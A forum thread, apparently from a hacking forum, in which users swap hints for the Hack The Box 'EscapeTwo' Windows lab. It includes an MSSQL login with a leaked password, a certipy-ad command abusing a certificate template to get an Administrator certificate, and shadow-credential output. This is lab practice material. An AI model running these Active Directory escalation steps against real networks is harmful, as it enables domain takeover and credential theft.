Jan 13, 2025, 04:37 AM
(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app?
Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git
|
EscapeTwo Hack the Box Season 7 (windows easy)
by RedBlock - Saturday January 11, 2025 at 03:43 PM
|
|
Jan 13, 2025, 04:37 AM
(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app? Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git
Jan 13, 2025, 05:00 AM
(Jan 13, 2025, 04:37 AM)akorshikai Wrote:(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app? In this links there only a .exe (for Windows). I can rewrite my question: In Linux, can I do de same that can do bloodyAD ?
Jan 13, 2025, 05:38 PM
(Jan 11, 2025, 03:43 PM)LostGem Wrote: Season 7 is finally here. Thanks all of you!!! This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Jan 13, 2025, 06:56 PM
(Jan 13, 2025, 05:00 AM)Art10n Wrote:(Jan 13, 2025, 04:37 AM)akorshikai Wrote:(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app? Check the wiki, you can install it using pip or by cloning the repository with git.
Jan 14, 2025, 02:13 AM
(Jan 12, 2025, 04:50 PM)greenfire Wrote:(Jan 11, 2025, 11:34 PM)KochiyaS Wrote: mssqlclient.py -p 1433 'sa'@dc01.sequel.htb -dc-ip {ip} (login with password found in unpacked excel spreadsheet found in smb share as rosa) certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip} this command will generate your admin pfx that you use for auth. it will show you the path as well, so just substitute the path. you are getting that error because it isnt in your pwd
Jan 14, 2025, 04:04 PM
How do you get to this conclusion for root? When I run Bloodhound I get it telling me to just do a DCSync attack when marking Ryan as owned and using shortest path to Domain Admins. Thanks!
(Jan 14, 2025, 04:04 PM)Dispute22311 Wrote: How do you get to this conclusion for root? When I run Bloodhound I get it telling me to just do a DCSync attack when marking Ryan as owned and using shortest path to Domain Admins. Thanks! Are you using the old bloodhound which comes with Kali? It is deprecated, using Bloodhound Community edition supports ADCS which will show you the attack route for the cert template. Old bloodhound will not show you ADCS. You will also have to use a compatible remote ingestor, using an ingestor like nxc, bloodhound-python, or bloodhound.py will not ingest the CA info. You can use rusthound-ce as it supports BHCE.
Jan 15, 2025, 01:38 PM
(This post was last modified: Jan 15, 2025, 02:02 PM by Aloha_SnackBar.)
Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,
Certipy v4.8.2 - by Oliver Lyak (ly4k) [*]Targeting user 'ca_svc' [*]Generating certificate [*]Certificate generated [*]Generating Key Credential [*]Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' [*]Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc' [*]Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc' [*]Authenticating as 'ca_svc' with the certificate [*]Using principal: ca_svc@sequel.htb [*]Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) [*]Restoring the old Key Credentials for 'ca_svc' [*]Successfully restored the old Key Credentials for 'ca_svc' [*]NT hash for 'ca_svc': None I'm pretty sure the NT hash is not supposed to be None I don't know what the hell to do anymore. A little nudge peeps. howpaws:
Jan 15, 2025, 02:35 PM
(Jan 15, 2025, 01:38 PM)Aloha_SnackBar Wrote: Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad, [*]Can you paste the command you used? Judging by the error message, you likely have a clock skew error that can be corrected using faketime or rdate. (Jan 15, 2025, 01:38 PM)Aloha_SnackBar Wrote: Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,kerb clock skew error, you need to sync ur time with the DC [*] sudo su (in root term) timedatectl set-ntp off; ntpdate {dc_ip} then when you are done timedatectl set-ntp on |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 367 | 90,943 |
7 hours ago Last Post: Anon141234 |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 85 | 7,683 |
Today, 05:35 AM Last Post: Fr1Rtx23 |
||
|
|
[FREE] HackTheBox All Cheatsheets | 1 | 262 |
Today, 05:34 AM Last Post: Fr1Rtx23 |
|
| rev_dudidudida | 1 | 236 |
Today, 12:25 AM Last Post: 0xcreep |
||
| [FREE] HTB HackTheBox CPTS CBBH CDSA CWEE exam preparation guide and hints | 5 | 1,851 |
Yesterday, 08:42 PM Last Post: Tamarisk |
||